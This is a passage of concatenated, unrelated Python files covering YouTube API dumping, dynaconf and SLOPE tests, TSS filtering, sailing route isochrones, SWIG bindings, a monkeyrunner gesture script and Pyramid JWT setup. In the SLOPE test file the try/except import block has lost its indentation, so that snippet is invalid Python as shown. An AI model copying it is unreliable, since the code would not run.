        dump_json_to_file(playlistitems_list_response, f'{file_prefix}{page_no}.json')
def main():
    """Authenticate, locate the user's uploads playlist, dump its snippets."""
    client_secret_file = config.client_secret_file
    youtube = get_authenticated_readonly_service(client_secret_file)
    uploads_playlist_id = get_my_uploads_playlist_id(youtube)
    # NOTE(review): assumes a 'data/' directory already exists — confirm.
    file_prefix = 'data/my_videos_page_'
    if uploads_playlist_id is not None:
        download_playlist_video_snippets(youtube, uploads_playlist_id, file_prefix)
    else:
        print('There is no uploaded videos playlist for this user.')


if __name__ == '__main__':
    main()
|
import numpy as np

# Solve the upper-triangular linear system a @ c = b.
a = np.array([[1, -3, -2],
              [0, 2, 4],
              [0, 0, -10]])
print("A :", a)

b = np.array([7, 4, 12])
c = np.linalg.solve(a, b)
print("C :", c)
|
# Domain-specific error types.  All derive from RuntimeError so callers can
# catch them individually or via the common base.

# Raised when a requested record does not exist.
class DataNotFound(RuntimeError):
    pass

# Raised for malformed or inconsistent data.
class DataError(RuntimeError):
    pass

# Raised when an age value is out of the accepted range.
class InvalidAge(RuntimeError):
    pass

# Raised when a measurement value fails validation.
class InvalidMeasurement(RuntimeError):
    pass
import os
import sys
import dynaconf
def test_djdt_382(tmpdir):
    """Regression test for dynaconf issue #382 (django-debug-toolbar).

    Builds a throwaway Django-style settings module on disk, then checks
    that DjangoDynaconf exposes its values and supports is_overridden().
    """
    settings_file = tmpdir.join("settings.py")
    settings_file.write("\n".join(["SECRET_KEY = 'dasfadfds2'"]))
    tmpdir.join("__init__.py").write("")
    # Side effects: mutates the process environment and sys.path so the
    # temporary module is importable as the Django settings module.
    os.environ["DJANGO_SETTINGS_MODULE"] = "settings"
    sys.path.append(str(tmpdir))
    __import__("settings")
    settings = dynaconf.DjangoDynaconf("settings", environments=True)
    settings.configure(settings_module="settings")
    assert settings.SECRET_KEY == "dasfadfds2"
    # FOO was never set, so it must not report as overridden.
    assert settings.is_overridden("FOO") is False
def test_override_settings_596(tmpdir):
    """Regression test for dynaconf issue #596 (django override_settings).

    Mimics django.test.utils.override_settings: an override holder must
    change its own view of a setting without mutating the original.
    """
    settings_file = tmpdir.join("other_settings.py")
    settings_file.write("\n".join(["SECRET_KEY = 'abcdef'"]))
    tmpdir.join("__init__.py").write("")
    # Side effects: mutates the process environment and sys.path.
    os.environ["DJANGO_SETTINGS_MODULE"] = "other_settings"
    sys.path.append(str(tmpdir))
    __import__("other_settings")
    settings = dynaconf.DjangoDynaconf("other_settings", environments=True)
    settings.configure(settings_module="other_settings")
    assert settings.SECRET_KEY == "abcdef"
    # mimic what django.test.utils.override_settings does
    class UserSettingsHolder(dynaconf.LazySettings):
        _django_override = True
    override = UserSettingsHolder(settings._wrapped)
    override.SECRET_KEY = "foobar"
    # overriden settings is changed
    assert override.SECRET_KEY == "foobar"
    # original not changed
    assert settings.SECRET_KEY == "abcdef"
|
"""
Solve a problem with SLOPE and compare to R
"""
from __future__ import print_function
import numpy as np
import nose.tools as nt
try:
import rpy2.robjects as rpy
rpy2_available = True
import rpy2.robjects.numpy2ri
from rpy2.robjects.packages import importr
from rpy2 import robjects
except ImportError:
rpy2_available = False
Rslope = True
try:
SLOPE = importr('SLOPE')
except:
Rslope = False
import regreg.api as rr
from regreg.atoms.slope import slope
from regreg.tests.decorators import set_seed_for_test
def fit_slope_R(X, Y):
    """Fit SLOPE in R on (X, Y) via rpy2 and return the R results.

    Returns the tuple (beta, E, lambda_seq, sigma, alpha) exactly as
    produced by the R SLOPE package (BH lambda sequence, l2 scaling,
    no intercept).  Requires rpy2 and the R 'SLOPE' package.
    """
    # Enable automatic numpy <-> R matrix conversion for this call.
    rpy2.robjects.numpy2ri.activate()
    robjects.r('''
    slope = function(X, Y, W=NA, choice_weights, tol_infeas = 1e-6,
    tol_rel_gap = 1e-6){
    result = SLOPE(X, Y, q = 0.1, lambda='bh', scale='l2',
    intercept=FALSE,
    tol_infeas = tol_infeas, tol_rel_gap = tol_rel_gap)
    print(result$alpha)
    return(list(beta = result$coefficients, E = result$selected, lambda_seq = result$lambda, sigma = result$sigma,
    alpha=result$alpha))
    }''')
    r_slope = robjects.globalenv['slope']
    n, p = X.shape
    r_X = robjects.r.matrix(X, nrow=n, ncol=p)
    r_Y = robjects.r.matrix(Y, nrow=n, ncol=1)
    result = r_slope(r_X, r_Y)
    # Restore default conversion behavior before returning.
    rpy2.robjects.numpy2ri.deactivate()
    return result[0], result[1], result[2], result[3], result[4]
@set_seed_for_test(10)
@np.testing.dec.skipif(True, msg="SLOPE parameterization in R has changed")
def test_using_SLOPE_weights():
    """Compare regreg's SLOPE solution against the R SLOPE package.

    Currently always skipped (see decorator): the R package's
    parameterization changed and the extraction below no longer matches.
    """
    n, p = 500, 50
    X = np.random.standard_normal((n, p))
    #Y = np.random.standard_normal(n)
    # Center and scale columns so both implementations see the same design.
    X -= X.mean(0)[None, :]
    X /= (X.std(0)[None, :] * np.sqrt(n))
    beta = np.zeros(p)
    beta[:5] = 5.
    Y = X.dot(beta) + np.random.standard_normal(n)
    output_R = fit_slope_R(X, Y)
    # Column 3 of the R coefficient path / lambda scaling — tied to the old
    # R SLOPE output layout.
    r_beta = np.squeeze(output_R[0])[:,3]
    r_lambda_seq = np.array(output_R[2]).reshape(-1)
    alpha = output_R[-1]
    W = np.asarray(r_lambda_seq * alpha[3]).reshape(-1)
    pen = slope(W, lagrange=1.)
    loss = rr.squared_error(X, Y)
    problem = rr.simple_problem(loss, pen)
    soln = problem.solve(tol=1.e-14, min_its=500)
    # we get a better objective value
    nt.assert_true(problem.objective(soln) < problem.objective(np.asarray(r_beta)))
    nt.assert_true(np.linalg.norm(soln - r_beta) < 1.e-6 * np.linalg.norm(soln))
@set_seed_for_test(10)
@np.testing.dec.skipif(True, msg="SLOPE parameterization in R has changed")
def test_using_SLOPE_prox():
    """Check regreg's SLOPE prox against the R package on an identity design.

    With X = I the SLOPE fit reduces to a proximal map, so the two
    solutions should agree to near machine precision.  Currently always
    skipped (see decorator).
    """
    n, p = 50, 50
    X = np.identity(n)
    beta = np.zeros(p)
    beta[:5] = 5.
    Y = X.dot(beta) + np.random.standard_normal(n)
    output_R = fit_slope_R(X, Y)
    # Tied to the old R SLOPE output layout (see test_using_SLOPE_weights).
    r_beta = np.squeeze(output_R[0])[:,3]
    r_lambda_seq = np.array(output_R[2]).reshape(-1)
    alpha = output_R[-1]
    W = np.asarray(r_lambda_seq * alpha[3]).reshape(-1)
    pen = slope(W, lagrange=1.)
    soln = pen.lagrange_prox(Y)
    # test that the prox maps agree
    nt.assert_true(np.linalg.norm(soln - r_beta) < 1.e-10 * np.linalg.norm(soln))
|
import math
from annogesiclib.gff3 import Gff3Parser
from annogesiclib.lib_reader import read_libs, read_wig
def read_gff(input_file):
    """Parse a GFF3 file and return its entries sorted by position.

    Each entry gets attributes["print"] = False so later stages can mark
    which candidates were reported.  Sorted by (seq_id, start, end, strand).

    FIX: the file handle is now closed deterministically via a context
    manager (the original leaked it).
    """
    datas = []
    gff_parser = Gff3Parser()
    with open(input_file, "r") as f_h:
        for entry in gff_parser.entries(f_h):
            entry.attributes["print"] = False
            datas.append(entry)
    datas = sorted(datas, key=lambda k: (k.seq_id, k.start, k.end, k.strand))
    return datas
def get_coverage(tar, wigs):
    '''Return the highest coverage observed at the start position of *tar*.

    *wigs* maps strain -> condition -> track -> list of per-position wig
    dicts; only the strain matching tar.seq_id is inspected.
    '''
    best = 0
    for strain, conds in wigs.items():
        if tar.seq_id != strain:
            continue
        for tracks in conds.values():
            # Renamed from the original's inner 'wigs', which shadowed
            # the parameter.
            for wig_track in tracks.values():
                value = wig_track[tar.start - 1]["coverage"]
                if value > best:
                    best = value
    return best
def compare_wig(tars, wig_fs, wig_rs):
    '''Attach each target's TSS coverage from the strand-matching wig set.

    Forward-strand ('+') targets read from *wig_fs*, reverse-strand ('-')
    from *wig_rs*; targets with any other strand value are left untouched.
    '''
    for tar in tars:
        if tar.strand == "+":
            source = wig_fs
        elif tar.strand == "-":
            source = wig_rs
        else:
            continue
        tar.attributes["coverage"] = get_coverage(tar, source)
def stat(tars, refs, cutoff, gene_length, cluster):
    '''Score predicted TSSs (*tars*) against reference TSSs (*refs*).

    A prediction is a true positive when it matches a reference on
    replicon and strand, its coverage passes *cutoff*, it lies within
    *gene_length*, and its start is within *cluster* bp of the reference.
    Returns (stats dict with tp/fp/miss counts and rates, reference count).
    Side effect: marks matched predictions via attributes["print"] = True.
    '''
    stats = {"tp": 0, "fp": 0, "miss": 0, "fp_rate": 0,
             "tp_rate": 0, "miss_rate": 0}
    num_ref = 0
    for ref in refs:
        num_ref += 1
        detect = False
        for tar in tars:
            if (ref.seq_id == tar.seq_id) and (
                    ref.strand == tar.strand) and (
                    float(tar.attributes["coverage"]) >= cutoff) and (
                    tar.start <= int(gene_length)):
                if math.fabs(ref.start - tar.start) <= cluster:
                    stats["tp"] += 1
                    tar.attributes["print"] = True
                    detect = True
        if not detect:
            stats["miss"] += 1
    # Predictions that passed the filters but matched no reference.
    for tar in tars:
        if (not tar.attributes["print"]) and (
                float(tar.attributes["coverage"]) >= cutoff) and (
                tar.start <= int(gene_length)):
            stats["fp"] += 1
    # FP rate is normalized by the number of non-reference positions.
    stats["fp_rate"] = float(stats["fp"]) / float(int(gene_length) - num_ref)
    stats["tp_rate"] = float(stats["tp"]) / float(num_ref)
    stats["miss_rate"] = float(stats["miss"]) / float(num_ref)
    return stats, num_ref
def print_file(tars, cutoff, out_file):
    """Write every target whose coverage passes *cutoff* to *out_file*.

    One line per passing target (its .info string).

    FIX: the output file is now closed deterministically via a context
    manager; the original leaked the handle, so buffered lines could be
    lost on interpreter exit.
    """
    with open(out_file, "w") as out:
        for tar in tars:
            if tar.attributes["coverage"] >= cutoff:
                out.write(tar.info + "\n")
def change_best(num_ref, best, stat_value):
    '''Scoring function to evaluate the change of TSS candidates.

    Compares the statistics at the current cutoff (stat_value) with the
    best statistics seen so far (best). Two regimes: rate-based when more
    than 100 references exist, absolute counts otherwise. Returns the
    (possibly replaced) best dict and whether it changed.
    '''
    change = False
    if num_ref > 100:
        # Rate-based comparison for large reference sets.
        if best["tp_rate"] - stat_value["tp_rate"] >= 0.1:
            # TP rate dropped too much: keep the current best.
            change = False
        else:
            if (best["tp_rate"] <= stat_value["tp_rate"]) and (
                    best["fp_rate"] >= stat_value["fp_rate"]):
                # No worse on either rate: accept the new cutoff.
                best = stat_value.copy()
                change = True
            elif (stat_value["tp_rate"] - best["tp_rate"] >= 0.01) and (
                    stat_value["fp_rate"] - best["fp_rate"] <= 0.00005):
                # Clear TP gain at only a marginal FP cost: accept.
                best = stat_value.copy()
                change = True
            elif (best["tp_rate"] - stat_value["tp_rate"] <= 0.01) and (
                    best["fp_rate"] - stat_value["fp_rate"] >= 0.00005):
                # Small TP loss compensated by a clear FP drop: accept.
                best = stat_value.copy()
                change = True
    else:
        # Count-based comparison for small reference sets.
        if best["tp"] - stat_value["tp"] >= 5:
            change = False
        else:
            if (best["tp"] <= stat_value["tp"]) and (
                    best["fp"] >= stat_value["fp"]):
                best = stat_value.copy()
                change = True
            # NOTE(review): `best` may already have been replaced just
            # above, making tp_diff 0 so both branches below are skipped.
            tp_diff = float(best["tp"] - stat_value["tp"])
            if tp_diff > 0:
                # Losing TPs is tolerated only if >= 5 FPs vanish per TP.
                if float(best["fp"] - stat_value["fp"]) >= 5 * tp_diff:
                    best = stat_value.copy()
                    change = True
            elif tp_diff < 0:
                tp_diff = tp_diff * -1
                # Gaining TPs is accepted unless it costs > 5 FPs per TP.
                if float(stat_value["fp"] - best["fp"]) <= 5 * tp_diff:
                    best = stat_value.copy()
                    change = True
    return best, change
def filter_low_expression(gff_file, args_tss, wig_f_file,
                          wig_r_file, out_file):
    '''Filter out lowly-expressed TSSs by searching for a coverage cutoff.

    Starting from cutoff 1, the cutoff is raised in 0.1 steps as long as
    change_best() judges the new statistics (vs the manually curated TSSs
    in args_tss.manual_file) an improvement. Surviving TSSs are written
    to out_file and the final cutoff is returned.
    '''
    tars = read_gff(gff_file)
    refs = read_gff(args_tss.manual_file)
    # NOTE(review): libs/texs are never used below — confirm whether
    # read_libs() is needed for side effects or can be dropped.
    libs, texs = read_libs(args_tss.input_lib, args_tss.wig_folder)
    wig_fs = read_wig(wig_f_file, "+", args_tss.libs)
    wig_rs = read_wig(wig_r_file, "-", args_tss.libs)
    compare_wig(tars, wig_fs, wig_rs)
    cutoff = 1
    first = True
    while True:
        stat_value, num_ref = stat(tars, refs, cutoff,
                                   args_tss.gene_length, args_tss.cluster)
        if first:
            # First pass only initializes `best`; the same cutoff is
            # re-evaluated on the next iteration before being raised.
            first = False
            best = stat_value.copy()
            continue
        else:
            best, change = change_best(num_ref, best, stat_value)
            if not change:
                break
        cutoff = cutoff + 0.1
    print_file(tars, cutoff, out_file)
    return cutoff
|
class Clock(object):
    """Container for a pair of split times.

    Attributes are set by the owning code after construction; from here we
    can only tell they start unset. Presumably igt = in-game time and
    rta = real-time attack — TODO confirm with the caller.
    """
    def __init__(self):
        # Both timers start unset.
        self.igt = None
        self.rta = None
|
from setuptools import setup
# Standard ament/colcon Python package setup for the `cair_client` ROS 2
# package: installs the ament resource marker and manifest, and exposes
# two console entry points (the CAIR service and client nodes).
package_name = 'cair_client'
setup(
    name=package_name,
    version='0.0.0',
    packages=[package_name],
    # Register the package with the ament index and install package.xml.
    data_files=[
        ('share/ament_index/resource_index/packages',
            ['resource/' + package_name]),
        ('share/' + package_name, ['package.xml']),
    ],
    install_requires=['setuptools'],
    zip_safe=True,
    maintainer='Lucrezia Grassi',
    maintainer_email='lucrezia.grassi@edu.unige.it',
    description='Package containing the service that allows to connect to the CAIR cloud.',
    license='Apache License 2.0',
    tests_require=['pytest'],
    # Executables exposed via `ros2 run cair_client <name>`.
    entry_points={
        'console_scripts': [
            'service = cair_client.cair_srv:main',
            'client = cair_client.cair_node:main',
        ],
    },
)
|
# 487. Max Consecutive Ones II
# Runtime: 388 ms, faster than 37.74% of Python3 online submissions for Max Consecutive Ones II.
# Memory Usage: 14.4 MB, less than 27.64% of Python3 online submissions for Max Consecutive Ones II.
class Solution:
    # Linear scan with at most one flippable zero: keep the length of the
    # current run (which includes the most recent zero once seen) and the
    # run that preceded that zero; flipping the zero joins the two runs.
    def findMaxConsecutiveOnes(self, nums: list[int]) -> int:
        best = 0
        run = 0
        prev_run = 0
        for value in nums:
            run += 1
            if value == 0:
                # The zero is counted inside `run`; stash it and restart.
                prev_run, run = run, 0
            best = max(best, run + prev_run)
        return best
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 23 16:15:51 2018
@author: jean-mi

Script exercising the isochrone routing solver (IsochroneClass) on a
loaded weather forecast: a deterministic run, a stochastic re-run of the
computed policy, a plot of the isochrones, and a discriminating start
point case.
"""
import IsochroneClass as IC
import sys
sys.path.append("../model")
from weatherTLKT import Weather
import numpy as np
import simulatorTLKT as SimC
from simulatorTLKT import Simulator
import matplotlib.pyplot as plt
import mpl_toolkits
from mpl_toolkits.basemap import Basemap
import matplotlib
from matplotlib import animation
matplotlib.rcParams.update({'font.size': 16})
import copy
import pickle
import sys
sys.path.append("../solver")
#from MyTree import Tree
from worker import Tree
# %% We load the forecast files
# WARNING: eventually the mean-wind file should be used here!!!
mydate = '20180108'
modelcycle = '0100z'
pathToSaveObj = '../data/' + mydate + '_gep_' + modelcycle + '.obj'
Wavg = Weather.load(pathToSaveObj)
# Restrict the forecast to the area of interest (Bay of Biscay region).
Wavg=Wavg.crop(latBound=[40, 50], lonBound=[360 - 15, 360])
#mydate = '20170519'
#modelcycle = '00'
#pathToSaveObj = '../data/' + mydate + '_' + modelcycle + '.obj'
#Wavg = Weather.load(pathToSaveObj)
# %% We shift the times so that all times are in the correct bounds for interpolations
Tini = Wavg.time[0]
Wavg.time = Wavg.time - Tini
# %% We set up the parameters of the simulation
# times=np.arange(0,min([Wavg.time[-1],Wspr.time[-1]]),1*HOURS_TO_DAY)
# Tf=len(times)
Tf = 24 * 8
HOURS_TO_DAY = 1/24
# One simulation step every 6 hours over an 8-day horizon.
times = np.arange(0, Tf * HOURS_TO_DAY, 6 * HOURS_TO_DAY)
lats = np.arange(Wavg.lat[0],Wavg.lat[-1], 0.05)
lons = np.arange(Wavg.lon[0], Wavg.lon[-1], 0.05)
stateInit = [0, 47.5, -3.5 + 360]
# Deterministic boat for the reference run.
SimC.Boat.UNCERTAINTY_COEFF = 0
Sim = Simulator(times, lats, lons, Wavg, stateInit)
# %% We set up the parameters of the simulation : destination
# The destination is defined as wherever a constant-heading run ends up.
heading = 240
tours = 0
tra = []
for t in Sim.times[0:-1]:
    tours +=1
    tra.append(list(Sim.doStep(heading)))
destination = Sim.state[1:3]
#for t in Sim.times[0:8]:
#    tours +=1
#    tra.append(list(Sim.doStep(heading)))
#destination = Sim.state[1:3]
# %% deterministic test for the IsochroneClass solver
Sim.reset(stateInit)
solver_iso = IC.Isochrone(Sim,stateInit[1:3],destination,delta_cap=10,increment_cap=9,nb_secteur=100,resolution=200)
temps,politique,politique_finale,trajectoire = solver_iso.isochrone_methode()
print('temps isochrones :',temps) # note: mind the way this time is computed
print('temps ligne droite :',tours*solver_iso.delta_t) # time obtained going straight (over 8 time steps we do worse, but on the longer simulation we gain half a day)
#print(politique)
#print(politique_finale)
#print(trajectoire)
states = solver_iso.positions_to_states()
basemap = solver_iso.sim.prepareBaseMap(proj='mill',res='i',Dline=10,dl=1.5,dh=1,centerOfMap=None)
solver_iso.sim.plotTraj(states,basemap,quiv=True)
print(destination)
# %% stochastic test for the IsochroneClass solver: replay the computed
# policy with a noisy boat and plot the resulting trajectory
SimC.Boat.UNCERTAINTY_COEFF = 0.4
Sim.reset(stateInit)
liste_states = []
liste_states.append(np.array(stateInit))
for i in range(len((politique))):
    Sim.doStep(politique[i])
    liste_states.append(np.array(Sim.state))
print(Sim.state[1:3])
basemap = solver_iso.sim.prepareBaseMap()
solver_iso.sim.plotTraj(liste_states,basemap,quiv=True)
x,y = basemap(destination[0],destination[1])
basemap.scatter(x,y,zorder=3,color='green',label='') # point misplaced
#%% display of the isochrones that were used
basemap = solver_iso.sim.prepareBaseMap()
ind = 0
for isochrone in solver_iso.isochrone_stock:
    for state in isochrone:
        x,y = basemap(state[1],state[2])
        #basemap.plot(x,y,markersize=4,zorder=ind,color='blue')
        basemap.scatter(x,y,zorder=ind,color='green',label='')
    ind += 1
#%% discriminating start point
pt_discri = [20,45.9,352.55]
Sim.reset(pt_discri)
solver_iso = IC.Isochrone(Sim,pt_discri[1:3],destination,delta_cap=5,increment_cap=18,nb_secteur=200,resolution=100)
temps,politique,politique_finale,trajectoire = solver_iso.isochrone_methode()
print('temps isochrones :',temps) # note: mind the way this time is computed
# time obtained going in a straight line (over 8 time steps we do worse,
# but on the longer simulation we gain half a day)
#print(politique)
#print(politique_finale)
#print(trajectoire)
states = solver_iso.positions_to_states()
basemap = solver_iso.sim.prepareBaseMap(proj='mill',res='i',Dline=10,dl=1.5,dh=1,centerOfMap=None)
solver_iso.sim.plotTraj(states,basemap,quiv=True)
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
# SWIG-generated loader for the compiled extension module. On Python >= 2.6
# it first looks for the shared library next to this file via imp, falling
# back to a plain import; on older Pythons it imports directly.
from sys import version_info
if version_info >= (2, 6, 0):
    def swig_import_helper():
        from os.path import dirname
        import imp
        fp = None
        try:
            fp, pathname, description = imp.find_module('_SimFlowEnergyTransferStorage_HotWaterTank_Expansion', [dirname(__file__)])
        except ImportError:
            import _SimFlowEnergyTransferStorage_HotWaterTank_Expansion
            return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion
        if fp is not None:
            try:
                _mod = imp.load_module('_SimFlowEnergyTransferStorage_HotWaterTank_Expansion', fp, pathname, description)
            finally:
                # Always close the file handle opened by find_module.
                fp.close()
            return _mod
    _SimFlowEnergyTransferStorage_HotWaterTank_Expansion = swig_import_helper()
    del swig_import_helper
else:
    import _SimFlowEnergyTransferStorage_HotWaterTank_Expansion
del version_info
# --- SWIG runtime compatibility shims (generated boilerplate; attribute
# access on proxy classes is routed through per-class getter/setter
# tables populated by the generated classes below). ---
try:
    _swig_property = property
except NameError:
    pass  # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
    # Attribute writes: 'thisown'/'this' are special SWIG slots; otherwise
    # consult the class's __swig_setmethods__ table.
    if (name == "thisown"):
        return self.this.own(value)
    if (name == "this"):
        if type(value).__name__ == 'SwigPyObject':
            self.__dict__[name] = value
            return
    method = class_type.__swig_setmethods__.get(name, None)
    if method:
        return method(self, value)
    if (not static):
        if _newclass:
            object.__setattr__(self, name, value)
        else:
            self.__dict__[name] = value
    else:
        raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
    return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
    # Attribute reads mirror the writes, via __swig_getmethods__.
    if (name == "thisown"):
        return self.this.own()
    method = class_type.__swig_getmethods__.get(name, None)
    if method:
        return method(self)
    if (not static):
        return object.__getattr__(self, name)
    else:
        raise AttributeError(name)
def _swig_getattr(self, class_type, name):
    return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
    try:
        strthis = "proxy of " + self.this.__repr__()
    except:
        strthis = ""
    return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
    _object = object
    _newclass = 1
except AttributeError:
    # Old-style-class fallback for ancient Pythons.
    class _object:
        pass
    _newclass = 0
try:
    import weakref
    weakref_proxy = weakref.proxy
except:
    weakref_proxy = lambda x: x
import SimFlowEnergyTransferStorage_HotWaterTank_Mixed
import base
# SWIG proxy class wrapping the C++ expansion hot-water-tank type; it
# inherits the setter/getter tables from its Mixed-tank base class.
class SimFlowEnergyTransferStorage_HotWaterTank_Expansion(SimFlowEnergyTransferStorage_HotWaterTank_Mixed.SimFlowEnergyTransferStorage_HotWaterTank):
    __swig_setmethods__ = {}
    for _s in [SimFlowEnergyTransferStorage_HotWaterTank_Mixed.SimFlowEnergyTransferStorage_HotWaterTank]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimFlowEnergyTransferStorage_HotWaterTank_Expansion, name, value)
    __swig_getmethods__ = {}
    for _s in [SimFlowEnergyTransferStorage_HotWaterTank_Mixed.SimFlowEnergyTransferStorage_HotWaterTank]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimFlowEnergyTransferStorage_HotWaterTank_Expansion, name)
    __repr__ = _swig_repr
    def EffectiveCapacity(self, *args):
        # Delegates to the compiled extension.
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_EffectiveCapacity(self, *args)
    def __init__(self, *args):
        this = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.new_SimFlowEnergyTransferStorage_HotWaterTank_Expansion(*args)
        try:
            self.this.append(this)
        except:
            self.this = this
    def _clone(self, f=0, c=None):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion__clone(self, f, c)
    __swig_destroy__ = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.delete_SimFlowEnergyTransferStorage_HotWaterTank_Expansion
    __del__ = lambda self: None
SimFlowEnergyTransferStorage_HotWaterTank_Expansion_swigregister = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_swigregister
SimFlowEnergyTransferStorage_HotWaterTank_Expansion_swigregister(SimFlowEnergyTransferStorage_HotWaterTank_Expansion)
# SWIG proxy for a C++ sequence (vector-like container) of Expansion
# tanks; every method delegates to the compiled extension.
class SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence(base.sequence_common):
    __swig_setmethods__ = {}
    for _s in [base.sequence_common]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence, name, value)
    __swig_getmethods__ = {}
    for _s in [base.sequence_common]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence, name)
    __repr__ = _swig_repr
    def __init__(self, *args):
        this = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.new_SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence(*args)
        try:
            self.this.append(this)
        except:
            self.this = this
    def assign(self, n, x):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_assign(self, n, x)
    def begin(self, *args):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_begin(self, *args)
    def end(self, *args):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_end(self, *args)
    def rbegin(self, *args):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_rbegin(self, *args)
    def rend(self, *args):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_rend(self, *args)
    def at(self, *args):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_at(self, *args)
    def front(self, *args):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_front(self, *args)
    def back(self, *args):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_back(self, *args)
    def push_back(self, *args):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_push_back(self, *args)
    def pop_back(self):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_pop_back(self)
    def detach_back(self, pop=True):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_detach_back(self, pop)
    def insert(self, *args):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_insert(self, *args)
    def erase(self, *args):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_erase(self, *args)
    def detach(self, position, r, erase=True):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_detach(self, position, r, erase)
    def swap(self, x):
        return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_swap(self, x)
    __swig_destroy__ = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.delete_SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence
    __del__ = lambda self: None
SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_swigregister = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_swigregister
SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_swigregister(SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence)
# This file is compatible with both classic and new-style classes.
|
#!/usr/bin/env monkeyrunner
# Jython script (monkeyrunner, Python 2 syntax) that simulates a touch-drag
# gesture on a connected Android device: press at (100, 500), drag right to
# (300, 500), then drag up to (300, 400), and lift the finger.
import time
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice
# Blocks until a device/emulator is reachable through adb.
device = MonkeyRunner.waitForConnection()
# Touch down screen
device.touch(100, 500, MonkeyDevice.DOWN)
# Move from 100, 500 to 300, 500 in ten 20px steps
for i in range(1, 11):
    device.touch(100 + 20 * i, 500, MonkeyDevice.MOVE)
    print "move ", 100 + 20 * i, 500
    time.sleep(0.1)
# Move from (300, 500 to 200, 500)
# NOTE(review): the comment above disagrees with the code, which keeps x at
# 300 and moves y from 500 down to 400 in ten 10px steps.
for i in range(1, 11):
    device.touch(300, 500 - 10 * i, MonkeyDevice.MOVE)
    print "move ", 300, 500 - 10 * i
    time.sleep(0.1)
# Remove finger from screen
device.touch(300, 400, MonkeyDevice.UP)
"""Authentication & Authorization."""
from conduit.auth.models import User
from pyramid.authorization import ACLAuthorizationPolicy
from pyramid.config import Configurator
from pyramid.request import Request
from pyramid.security import Allow
import typing as t
def includeme(config: Configurator) -> None:
    """Pyramid knob: wire up authorization, JWT auth, routes and request.user."""
    # Pyramid requires an authorization policy to be active.
    config.set_authorization_policy(ACLAuthorizationPolicy())
    # Enable JWT authentication.
    config.include("pyramid_jwt")
    config.set_jwt_authentication_policy(
        config.registry.settings["jwt.secret"], auth_type="Token"
    )
    # Add API routes for auth
    config.add_route("user", "/api/user")
    config.add_route("users", "/api/users")
    config.add_route("users.login", "/api/users/login")
    # Add request.user shorthand (reify=True caches the lookup per request)
    config.add_request_method(get_user, "user", reify=True)
def get_user(request: Request) -> t.Optional[User]:
